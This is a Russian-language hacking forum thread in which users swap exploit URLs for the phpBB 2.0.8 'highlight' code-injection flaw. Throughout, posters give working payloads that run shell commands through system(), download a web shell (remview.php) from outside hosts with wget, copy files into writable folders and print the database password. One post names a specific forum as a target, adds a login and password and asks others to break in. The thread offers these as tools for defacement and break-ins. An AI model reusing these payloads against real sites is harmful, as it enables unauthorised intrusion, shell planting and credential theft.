Люди, подскажите плизз.... буду очень признателен:

вот когда я хочу скатать шелл на сервер, используя:


http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527


мне в ответ пишет:

he html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

можно закачать shell этой командой:
viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%60.%2527&ls=wget%20http://badsite/shell.php

или:
viewtopic.php?p=3906&highlight=%2527.$poster=`wget%09http://badsite/shell.php`.%2527

может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)

http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527


Onyx3, а почему ...t=44=... это бред! в твоём случае надо писать без t= !

а у меня вообще пишет что такой темы нет :confused:

Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums

И не одна из этих комманд чтобы залить шелл не действует!!!
Пишет либо - модуль не активен, либо ошибку Денвера!!!


Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

поробуй выполнить команды так:
viewtopic.php?t=1&highlight=%2527.system($_GET[id]).%2527&id=ls -la

а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"

и еще, может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)

ну узнал, я какая папка доступна на запись (даже в папке форум), что в запрос надо написать ?

viewtopic.php?a=http://123.123.123.123/remview.php&b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527 [B]???????

типо этого? b=../../db/
а что вместо точек писать? полный путь? где находиться папка?
в таком случае как именно?
что брать за корневой католог?
forum/db/
или полный путь
/usr/home/public_html/forum


не понятно всё это...

P.S.
ведь drwxrwxrwx - это открытая папка на запись.

да не геморься ты, лучше залей обычным wget'ом и потом скопируй...

поробуй выполнить команды так:

мне в ответ пишет:

The html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group

Эй ну что кто нибудь встречал такую проблему??

Эй народ по активнее, по активне

вот форум версии 2.0.8
http://lipetsk.ru/town/forum2/
сам я профан во всем этом
но был рад если его ломанули

pass: pinochet
user: www2

ответ на мой пост?

эээ может кому полезно будет =)
http://forum.serverroom.us/remview.php

Какие вы можете предложить варианты взлома форму 2.08 , Union не проходит, может ещё какие нибудь есть??? И ещё как можно посматреть папки которые открыты для записи???(прошу написать комманду)

Народ киньте ссылку где можно скачать remview.php

Free download from http://php.spb.ru/remview/

Плиззз... напишите какими прогами можно подменять Cookie??? если не сложно то напишите ссылочку...

Плиззз... напишите какими прогами можно подменять Cookie??? если не сложно то напишите ссылочку...

CookieEditor
http://antichat.ru/txt/old/progs.shtml

А как посматреть какие папки открыты на запись???

помогите плиззззз

Народ какой коммандой можно посматреть какие папки открыты на запись???

Дорогие друзья.
Вы хоть раз видели сервер чтоб там было разрешено
`ls` т.е. safe mode?
Я не.
Так что (как у меня в старом видео) - %2527.system($_GET[cmd]).include%2527
INCLUDE нужно для того чтобы кусочек #b( ... убрать из system.

find / -perm -2 -ls

Смотреть папки, открытые на запись (сервер unix):
ls -la
просто ls - только список, ls -1 - вертикальный

Смотреть папки, открытые на запись (сервер unix):
ls -la
просто ls - только список, ls -1 - вертикальный
А если сервер стоит на винде Хр, то эта комманда не изменится???

А если сервер стоит на винде Хр, то эта комманда не изменится???
дык kez написал команды для никсов,а ты про винду!на винде cmd!

дык kez написал команды для никсов,а ты про винду!на винде cmd!

Ну вот я так и думал.... а для винды как можно посматреть???

У себя на тачке:
выполнить cmd
в коммандной help

Люди, Я непрошу взломать то или это. Мне нужна статья или какоенибудь пояснение как использовать команды как wget ls -la и т.д. в вэб интерфейсе. Хочу разобраться. Цель заливка remview.php. И есть ли сейчас перспектива в дэфейсе такого плана? Заранее благадарен

wget - заливка файла на сайт
ls - просмотр файлов в папке
ls -la - полный просмотр с правами доступа))
перемещение по каталогам, команда: cd
cd .. - перемещение на каталог выше
wget http://hompaga.ru/remview.php - зальёт тебе remview.php на сайт..

Можно на примере
http://[Target]/forum/index.php?showtopic=[№]?
Это пример IPB форума ну и остальные аналогично...
Как я понял, что опирирование идёт по средствам адресной строки браузера и всё?

&highlight=%2527.$poster=`pwd`.%2527 Это как я понял выдаёт дирикторию
Далее это параметры мускула так?
&highlight=%2527.$poster=`bdname`.%2527
&highlight=%2527.$poster=`bdpass`.%2527
Просмотр попок для записи
&highlight=%2527.$poster=`&cmd`.%2527&cmd=cd ..;ls -l

Короче поправте если что то накарябал нетак... =\

Во! Нашёл :) http://forum.antichat.ru/showthread.php?t=5076

ЕЕЕЕЕЕЕЕЕЕЕ Я щас убью когото.
Последний раз говорю.
Если ктокто придумал такой сплойт это не значит что он работает!
`ls` не разрешено если не safe mode.
Вот так можно
viewtopic.php?command=uname -a;ls -la&t=10&highlight=%2527.system($_GET[command]).include%2527
ЕЩЁ РАЗ. В конце остается кусок )b# типа того. Он идет в system() т.к. там без скобок.
Поэтому я его сую в ф-ию которая НИЧЕ не возвращает!

Вообщем уже много людей хотят со мной пообщаться по поводу include в конце. Стучите в асю. И все считают что я не то написал. И потом вылезает ошибка Cannot include ")b#"
Все правильно!
Если надо узнать пароль\логин к базе
http://.../viewtopic.php?t=10&highlight=%2527.$poster=$dbpasswd.%2527

Ок! Спасибо братуха :) Разобрался!

Пожалуста... надо в новостях это подправить ))